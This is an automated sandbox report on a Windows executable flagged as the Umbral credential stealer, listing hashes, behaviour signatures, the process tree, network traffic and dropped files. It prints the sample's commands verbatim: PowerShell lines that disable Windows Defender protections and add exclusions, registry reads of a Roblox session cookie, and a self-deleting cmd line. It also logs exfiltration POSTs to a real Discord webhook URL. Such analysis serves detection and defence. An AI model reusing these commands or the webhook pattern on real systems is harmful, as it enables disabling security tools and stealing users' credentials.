Analysis

  • max time kernel
    95s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/09/2024, 02:13 UTC

General

  • Target

    bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe

  • Size

    231KB

  • MD5

    447297048bf59e02973e2a92506bcf82

  • SHA1

    2ed1aca8f40418d12f99675157b89e1d2d26ebb0

  • SHA256

    bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc

  • SHA512

    34c14cfb4baeab9bc45445f4167c90d1c362df04ab185a69676088011dfb3f9f78e951ece9986f42fb6ec6d31f22f7dc012d2ccbf8cf02ef0261c8aa698eaf76

  • SSDEEP

    6144:RloZM+rIkd8g+EtXHkv/iD4VDTfGELns8d42X3Wo1b8e1mOi:joZtL+EP8VDTfGELns8d42X3Wk0

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
    "C:\Users\Admin\AppData\Local\Temp\bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3100
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:336
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe"
      2⤵
      • Views/modifies file attributes
      PID:1072
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4248
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3264
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1836
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4024
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:4904
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:2684
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:740
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:4364
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe" && pause
          2⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:3544

      Network

      • flag-us
        DNS
        gstatic.com
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        172.217.16.227
      • flag-gb
        GET
        https://gstatic.com/generate_204
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        Remote address:
        172.217.16.227:443
        Request
        GET /generate_204 HTTP/1.1
        Host: gstatic.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Content-Length: 0
        Cross-Origin-Resource-Policy: cross-origin
        Date: Wed, 04 Sep 2024 02:13:16 GMT
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-us
        DNS
        ip-api.com
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Wed, 04 Sep 2024 02:13:16 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 55
        X-Rl: 42
      • flag-us
        DNS
        209.205.72.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        209.205.72.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        227.16.217.172.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        227.16.217.172.in-addr.arpa
        IN PTR
        Response
        227.16.217.172.in-addr.arpa
        IN PTR
        mad08s04-in-f31e100net
        227.16.217.172.in-addr.arpa
        IN PTR
        lhr48s28-in-f3�H
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-apicom
      • flag-us
        DNS
        140.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        140.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Wed, 04 Sep 2024 02:13:20 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 161
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-us
        DNS
        discord.com
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.128.233
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.137.232
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.138.232
      • flag-us
        POST
        https://discord.com/api/webhooks/1266849412760731869/Sdaf58eEAN8FusOdQ213bDIrAchOhjmFy_eDf8BG2aDRnXHmtcGPiw0sTqKLC0eJ7Pf_
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        Remote address:
        162.159.128.233:443
        Request
        POST /api/webhooks/1266849412760731869/Sdaf58eEAN8FusOdQ213bDIrAchOhjmFy_eDf8BG2aDRnXHmtcGPiw0sTqKLC0eJ7Pf_ HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: application/json; charset=utf-8
        Host: discord.com
        Content-Length: 940
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 404 Not Found
        Date: Wed, 04 Sep 2024 02:13:22 GMT
        Content-Type: application/json
        Content-Length: 45
        Connection: keep-alive
        set-cookie: __dcfduid=42a62f2e6a6311ef9fbbe69ea39d855a; Expires=Mon, 03-Sep-2029 02:13:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1725416003
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8CNW4Sol0L6%2B%2B4WAqZNoItRl%2BWuwsiuEUHy0%2BQwrrdmbIip5s94rTm89T7TpUbtENls15vJe%2F5a0Ucc76M9CBHZWwmzFHtFetWJYAmlfz5XzUYDFKHsHiHQqV26w"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=42a62f2e6a6311ef9fbbe69ea39d855a5597455cba46dc5a19dbd24fb24d63e49f1da82e16fb7a5907d5a90cd3747097; Expires=Mon, 03-Sep-2029 02:13:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=e16d60f37ba74aad5f7510f1fcef7cdc3c2e87a6-1725416002; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=QPzx6XlNaeOj8YPO6UDA_y3GTLLJZ1hiIC5Z80BflfE-1725416002471-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 8bda75be8efb88a3-LHR
      • flag-us
        POST
        https://discord.com/api/webhooks/1266849412760731869/Sdaf58eEAN8FusOdQ213bDIrAchOhjmFy_eDf8BG2aDRnXHmtcGPiw0sTqKLC0eJ7Pf_
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        Remote address:
        162.159.128.233:443
        Request
        POST /api/webhooks/1266849412760731869/Sdaf58eEAN8FusOdQ213bDIrAchOhjmFy_eDf8BG2aDRnXHmtcGPiw0sTqKLC0eJ7Pf_ HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: multipart/form-data; boundary="70257f5c-3e39-49b7-a0f4-ac8f86098d62"
        Host: discord.com
        Cookie: __dcfduid=42a62f2e6a6311ef9fbbe69ea39d855a; __sdcfduid=42a62f2e6a6311ef9fbbe69ea39d855a5597455cba46dc5a19dbd24fb24d63e49f1da82e16fb7a5907d5a90cd3747097; __cfruid=e16d60f37ba74aad5f7510f1fcef7cdc3c2e87a6-1725416002; _cfuvid=QPzx6XlNaeOj8YPO6UDA_y3GTLLJZ1hiIC5Z80BflfE-1725416002471-0.0.1.1-604800000
        Content-Length: 434853
        Expect: 100-continue
        Response
        HTTP/1.1 404 Not Found
        Date: Wed, 04 Sep 2024 02:13:22 GMT
        Content-Type: application/json
        Content-Length: 45
        Connection: keep-alive
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 3
        x-ratelimit-reset: 1725416004
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MT%2FFWZgywZkSZOQASyBcFo0MDkBdUhDQ5GpleTRsW%2B2WoUaMPuxqOreoW5feiwXZpQg%2FCkLV0JZBSeP9xXFR7ZOp0%2F6vsFf7T7q4wnW9N%2B2mqvZ%2FHlUMCENbVUbq"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Server: cloudflare
        CF-RAY: 8bda75bfaf8a88a3-LHR
      • flag-us
        DNS
        233.128.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        233.128.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        104.219.191.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        104.219.191.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        26.165.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        26.165.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        206.23.85.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        206.23.85.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        30.243.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        30.243.111.52.in-addr.arpa
        IN PTR
        Response
      • 172.217.16.227:443
        https://gstatic.com/generate_204
        tls, http
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        724 B
        4.9kB
        8
        8

        HTTP Request

        GET https://gstatic.com/generate_204

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        310 B
        267 B
        5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        285 B
        510 B
        5
        4

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.128.233:443
        https://discord.com/api/webhooks/1266849412760731869/Sdaf58eEAN8FusOdQ213bDIrAchOhjmFy_eDf8BG2aDRnXHmtcGPiw0sTqKLC0eJ7Pf_
        tls, http
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        451.9kB
        11.4kB
        345
        147

        HTTP Request

        POST https://discord.com/api/webhooks/1266849412760731869/Sdaf58eEAN8FusOdQ213bDIrAchOhjmFy_eDf8BG2aDRnXHmtcGPiw0sTqKLC0eJ7Pf_

        HTTP Response

        404

        HTTP Request

        POST https://discord.com/api/webhooks/1266849412760731869/Sdaf58eEAN8FusOdQ213bDIrAchOhjmFy_eDf8BG2aDRnXHmtcGPiw0sTqKLC0eJ7Pf_

        HTTP Response

        404
      • 8.8.8.8:53
        gstatic.com
        dns
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        57 B
        73 B
        1
        1

        DNS Request

        gstatic.com

        DNS Response

        172.217.16.227

      • 8.8.8.8:53
        ip-api.com
        dns
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        56 B
        72 B
        1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        209.205.72.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        209.205.72.20.in-addr.arpa

      • 8.8.8.8:53
        227.16.217.172.in-addr.arpa
        dns
        73 B
        140 B
        1
        1

        DNS Request

        227.16.217.172.in-addr.arpa

      • 8.8.8.8:53
        1.112.95.208.in-addr.arpa
        dns
        71 B
        95 B
        1
        1

        DNS Request

        1.112.95.208.in-addr.arpa

      • 8.8.8.8:53
        140.32.126.40.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        140.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        discord.com
        dns
        bb7252177d00b2242b820310ffe3b45f31ee666d85cd6b521f93566c3edc27cc.exe
        57 B
        137 B
        1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.128.233
        162.159.135.232
        162.159.137.232
        162.159.136.232
        162.159.138.232

      • 8.8.8.8:53
        233.128.159.162.in-addr.arpa
        dns
        74 B
        136 B
        1
        1

        DNS Request

        233.128.159.162.in-addr.arpa

      • 8.8.8.8:53
        104.219.191.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        104.219.191.52.in-addr.arpa

      • 8.8.8.8:53
        26.165.165.52.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        26.165.165.52.in-addr.arpa

      • 8.8.8.8:53
        206.23.85.13.in-addr.arpa
        dns
        71 B
        145 B
        1
        1

        DNS Request

        206.23.85.13.in-addr.arpa

      • 8.8.8.8:53
        30.243.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        30.243.111.52.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        2979eabc783eaca50de7be23dd4eafcf

        SHA1

        d709ce5f3a06b7958a67e20870bfd95b83cad2ea

        SHA256

        006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

        SHA512

        92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        c65738617888921a153bd9b1ef516ee7

        SHA1

        5245e71ea3c181d76320c857b639272ac9e079b1

        SHA256

        4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

        SHA512

        2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        276798eeb29a49dc6e199768bc9c2e71

        SHA1

        5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

        SHA256

        cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

        SHA512

        0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        ec79fae4e7c09310ebf4f2d85a33a638

        SHA1

        f2bdd995b12e65e7ed437d228f22223b59e76efb

        SHA256

        e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a

        SHA512

        af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rqtgmung.i3k.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/3100-71-0x000001A074C80000-0x000001A074C8A000-memory.dmp

        Filesize

        40KB

      • memory/3100-35-0x000001A074C50000-0x000001A074C6E000-memory.dmp

        Filesize

        120KB

      • memory/3100-90-0x00007FF8D99A0000-0x00007FF8DA461000-memory.dmp

        Filesize

        10.8MB

      • memory/3100-72-0x000001A074D90000-0x000001A074DA2000-memory.dmp

        Filesize

        72KB

      • memory/3100-2-0x00007FF8D99A0000-0x00007FF8DA461000-memory.dmp

        Filesize

        10.8MB

      • memory/3100-33-0x000001A074CC0000-0x000001A074D36000-memory.dmp

        Filesize

        472KB

      • memory/3100-34-0x000001A074D40000-0x000001A074D90000-memory.dmp

        Filesize

        320KB

      • memory/3100-0-0x00007FF8D99A3000-0x00007FF8D99A5000-memory.dmp

        Filesize

        8KB

      • memory/3100-1-0x000001A072590000-0x000001A0725D0000-memory.dmp

        Filesize

        256KB

      • memory/4248-15-0x00007FF8D99A0000-0x00007FF8DA461000-memory.dmp

        Filesize

        10.8MB

      • memory/4248-3-0x000002DF2A710000-0x000002DF2A732000-memory.dmp

        Filesize

        136KB

      • memory/4248-4-0x00007FF8D99A0000-0x00007FF8DA461000-memory.dmp

        Filesize

        10.8MB

      • memory/4248-5-0x00007FF8D99A0000-0x00007FF8DA461000-memory.dmp

        Filesize

        10.8MB

      • memory/4248-18-0x00007FF8D99A0000-0x00007FF8DA461000-memory.dmp

        Filesize

        10.8MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.